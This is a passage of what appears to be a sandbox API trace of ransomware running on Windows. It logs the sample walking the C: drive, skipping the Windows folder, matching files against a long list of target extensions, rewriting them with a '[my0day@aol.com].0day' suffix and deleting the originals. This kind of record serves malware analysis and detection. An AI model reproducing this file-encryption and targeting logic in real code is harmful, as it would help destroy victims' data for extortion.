out: lpNewFilePointer=0x0) returned 1 [0057.365] SetEndOfFile (hFile=0x198) returned 1 [0057.366] CloseHandle (hObject=0x198) returned 1 [0057.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.366] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif")) returned 1 [0057.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0057.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0057.367] lstrlenW (lpString=".doc") returned 4 [0057.367] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0057.367] lstrlenW (lpString=".docx") returned 5 [0057.367] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0057.367] lstrlenW (lpString=".pdf") returned 4 [0057.367] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0057.367] lstrlenW (lpString=".xls") returned 4 [0057.367] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0057.367] lstrlenW (lpString=".xlsx") returned 5 [0057.367] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0057.367] lstrlenW (lpString=".ppt") returned 4 [0057.367] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0057.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0057.367] lstrlenW (lpString=".zip") returned 4 [0057.367] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0057.367] lstrlenW (lpString=".rar") returned 4 [0057.367] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0057.367] lstrlenW (lpString=".bz2") returned 4 [0057.367] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0057.367] lstrlenW (lpString=".7z") returned 3 [0057.367] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0057.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0057.367] lstrlenW (lpString=".dbf") returned 4 [0057.367] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0057.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0057.367] lstrlenW (lpString=".1cd") returned 4 [0057.367] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0057.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0057.367] lstrlenW (lpString=".jpg") returned 4 [0057.367] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0057.368] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.368] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.368] GetLastError () returned 0x0 [0057.368] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x2244, lpOverlapped=0x0) returned 1 [0057.369] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x2250, lpOverlapped=0x0) returned 1 [0057.370] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.370] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.370] SetEndOfFile (hFile=0x210) returned 1 [0057.371] CloseHandle (hObject=0x210) returned 1 [0057.371] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.371] SetEndOfFile (hFile=0x198) returned 1 [0057.371] CloseHandle (hObject=0x198) returned 1 [0057.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.372] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf")) returned 1 [0057.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0057.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0057.372] lstrlenW (lpString=".doc") returned 4 [0057.372] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.372] lstrlenW (lpString=".docx") returned 5 [0057.372] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.372] lstrlenW (lpString=".pdf") returned 4 [0057.372] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.372] lstrlenW (lpString=".xls") returned 4 [0057.372] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.372] lstrlenW (lpString=".xlsx") returned 5 [0057.372] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.372] lstrlenW (lpString=".ppt") returned 4 [0057.372] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0057.372] lstrlenW (lpString=".zip") returned 4 [0057.372] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.372] lstrlenW (lpString=".rar") returned 4 [0057.372] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.372] lstrlenW (lpString=".bz2") returned 4 [0057.373] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.373] lstrlenW (lpString=".7z") returned 3 [0057.373] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0057.373] lstrlenW (lpString=".dbf") returned 4 [0057.373] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0057.373] lstrlenW (lpString=".1cd") returned 4 [0057.373] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0057.373] lstrlenW (lpString=".jpg") returned 4 [0057.373] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.373] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.373] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.373] GetLastError () returned 0x0 [0057.374] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x3896, lpOverlapped=0x0) returned 1 [0057.431] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x38a0, lpOverlapped=0x0) returned 1 [0057.431] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.431] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.432] SetEndOfFile (hFile=0x210) returned 1 [0057.600] CloseHandle (hObject=0x210) returned 1 [0057.600] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.600] SetEndOfFile (hFile=0x198) returned 1 [0057.750] CloseHandle (hObject=0x198) returned 1 [0057.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.750] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf")) returned 1 [0057.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0057.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0057.832] lstrlenW (lpString=".doc") returned 4 [0057.832] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.832] lstrlenW (lpString=".docx") returned 5 [0057.832] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.832] lstrlenW (lpString=".pdf") returned 4 [0057.832] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.832] lstrlenW (lpString=".xls") returned 4 [0057.832] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.832] lstrlenW (lpString=".xlsx") returned 5 [0057.832] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.832] lstrlenW (lpString=".ppt") returned 4 [0057.832] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0057.832] lstrlenW (lpString=".zip") returned 4 [0057.832] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.832] lstrlenW (lpString=".rar") returned 4 [0057.832] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.832] lstrlenW (lpString=".bz2") returned 4 [0057.832] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.832] lstrlenW (lpString=".7z") returned 3 [0057.833] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0057.833] lstrlenW (lpString=".dbf") returned 4 [0057.833] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0057.833] lstrlenW (lpString=".1cd") returned 4 [0057.833] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0057.833] lstrlenW (lpString=".jpg") returned 4 [0057.833] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.922] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.925] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0057.929] GetLastError () returned 0x0 [0057.930] ReadFile (hFile=0x17c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0) Thread: id = 14 os_tid = 0xac8 [0032.909] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3720ac8 [0032.910] lstrlenW (lpString="C:") returned 2 [0032.910] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2edfd00 | out: lpFindFileData=0x2edfd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x3730ad0 [0032.910] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0032.910] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0032.910] lstrlenW (lpString="$Recycle.Bin") returned 12 [0032.910] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0032.910] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3730b10 [0032.911] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0032.911] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3740b18 [0032.911] FindNextFileW (in: hFindFile=0x3740b18, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.911] FindNextFileW (in: hFindFile=0x3740b18, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0032.911] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0032.911] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0032.911] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0032.911] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0032.911] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3741b60 [0032.912] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0032.912] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3751b68 [0032.912] FindNextFileW (in: hFindFile=0x3751b68, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.912] FindNextFileW (in: hFindFile=0x3751b68, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0032.912] lstrlenW (lpString="desktop.ini") returned 11 [0032.912] lstrlenW (lpString=".1cd") returned 4 [0032.912] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0032.912] lstrlenW (lpString=".3ds") returned 4 [0032.912] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0032.912] lstrlenW (lpString=".3fr") returned 4 [0032.912] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0032.912] lstrlenW (lpString=".3g2") returned 4 [0032.912] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0032.912] lstrlenW (lpString=".3gp") returned 4 [0032.912] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0032.912] lstrlenW (lpString=".7z") returned 3 [0032.912] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0032.912] lstrlenW (lpString=".accda") returned 6 [0032.912] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0032.912] lstrlenW (lpString=".accdb") returned 6 [0032.912] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0032.912] lstrlenW (lpString=".accdc") returned 6 [0032.912] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0032.913] lstrlenW (lpString=".accde") returned 6 [0032.913] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0032.913] lstrlenW (lpString=".accdt") returned 6 [0032.913] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0032.913] lstrlenW (lpString=".accdw") returned 6 [0032.913] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0032.913] lstrlenW (lpString=".adb") returned 4 [0032.913] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".adp") returned 4 [0032.913] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".ai") returned 3 [0032.913] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0032.913] lstrlenW (lpString=".ai3") returned 4 [0032.913] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".ai4") returned 4 [0032.913] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".ai5") returned 4 [0032.913] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".ai6") returned 4 [0032.913] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".ai7") returned 4 [0032.913] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".ai8") returned 4 [0032.913] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".anim") returned 5 [0032.913] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0032.913] lstrlenW (lpString=".arw") returned 4 [0032.913] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".as") returned 3 [0032.913] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0032.913] lstrlenW (lpString=".asa") returned 4 [0032.913] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".asc") returned 4 [0032.913] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0032.913] lstrlenW (lpString=".ascx") returned 5 [0032.914] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0032.914] lstrlenW (lpString=".asm") returned 4 [0032.914] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".asmx") returned 5 [0032.914] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0032.914] lstrlenW (lpString=".asp") returned 4 [0032.914] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".aspx") returned 5 [0032.914] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0032.914] lstrlenW (lpString=".asr") returned 4 [0032.914] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".asx") returned 4 [0032.914] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".avi") returned 4 [0032.914] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".avs") returned 4 [0032.914] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".backup") returned 7 [0032.914] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0032.914] lstrlenW (lpString=".bak") returned 4 [0032.914] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".bay") returned 4 [0032.914] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".bd") returned 3 [0032.914] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0032.914] lstrlenW (lpString=".bin") returned 4 [0032.914] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".bmp") returned 4 [0032.914] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".bz2") returned 4 [0032.914] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0032.914] lstrlenW (lpString=".c") returned 2 [0032.914] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0032.915] lstrlenW (lpString=".cdr") returned 4 [0032.915] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".cer") returned 4 [0032.915] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".cf") returned 3 [0032.915] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0032.915] lstrlenW (lpString=".cfc") returned 4 [0032.915] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".cfm") returned 4 [0032.915] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".cfml") returned 5 [0032.915] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0032.915] lstrlenW (lpString=".cfu") returned 4 [0032.915] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".chm") returned 4 [0032.915] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".cin") returned 4 [0032.915] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".class") returned 6 [0032.915] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0032.915] lstrlenW (lpString=".clx") returned 4 [0032.915] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".config") returned 7 [0032.915] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0032.915] lstrlenW (lpString=".cpp") returned 4 [0032.915] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".cr2") returned 4 [0032.915] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".crt") returned 4 [0032.915] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".crw") returned 4 [0032.915] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0032.915] lstrlenW (lpString=".cs") returned 3 [0032.915] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0032.916] lstrlenW (lpString=".css") returned 4 [0032.916] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".csv") returned 4 [0032.916] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".cub") returned 4 [0032.916] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".dae") returned 4 [0032.916] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".dat") returned 4 [0032.916] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".db") returned 3 [0032.916] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0032.916] lstrlenW (lpString=".dbf") returned 4 [0032.916] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".dbx") returned 4 [0032.916] 